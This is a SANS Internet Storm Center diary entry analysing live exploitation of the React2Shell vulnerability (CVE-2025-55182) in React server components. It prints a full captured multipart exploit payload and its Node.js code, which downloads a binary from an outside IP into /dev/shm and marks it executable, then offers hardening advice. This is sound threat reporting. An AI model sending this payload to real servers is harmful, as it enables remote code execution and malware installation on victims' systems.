More React2Shell Exploits CVE-2025-55182

    Published: 2025-12-15. Last Updated: 2025-12-15 13:17:34 UTC
    by Johannes Ullrich (Version: 1)
    0 comment(s)

    Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the "plain" exploit attempts have already been exploited several times. Here is today's most popular exploit payload:

    ------WebKitFormBoundaryxtherespoopalloverme
    Content-Disposition: form-data; name="0"

    {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/dev/shm/lrt').on('finish',()=>process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}
    ------WebKitFormBoundaryxtherespoopalloverme
    Content-Disposition: form-data; name="1"

    "$@0"
    ------WebKitFormBoundaryxtherespoopalloverme
    ------WebKitFormBoundaryxtherespoopalloverme--

    To make the key components more readable:

    process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',
    r=>r.pipe(process.mainModule.require('fs').
    createWriteStream('/dev/shm/lrt').on('finish'

    This statement downloads the binary from 51.81.104.115 into a local file, /dev/shm/lrt.

    process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));

    And then the script is marked as executable. It is unclear whether the script is explicitly executed. The Virustotal summary is somewhat ambiguous regarding the binary, identifying it as either adware or a miner [1]. Currently, this is the most common exploit variant we see for react2shell. 

    Other versions of the exploit use /dev/lrt and /tmp/lrt instead of /dev/shm/lrt to store the malware.

    /dev/shm and /dev/tmp are typically world writable and should always work. /dev requires root privileges, and these days it is unlikely for a web application to run as root. One recommendation to harden Linux systems is to create/tmp as its own partition and mark it as "noexec" to prevent it from being used as a scratch space to run exploit code. But this is sometimes tough to implement with "normal" processes running code in /tmp (not pretty, but done ever so often)

    [1] https://www.virustotal.com/gui/file/895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b/detection

    --
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
    Twitter|

    Keywords: react react2shell
    0 comment(s)
    ISC Stormcast For Monday, December 15th, 2025 https://isc.sans.edu/podcastdetail/9738

      Comments

      Login here to join the discussion.


      Diary Archives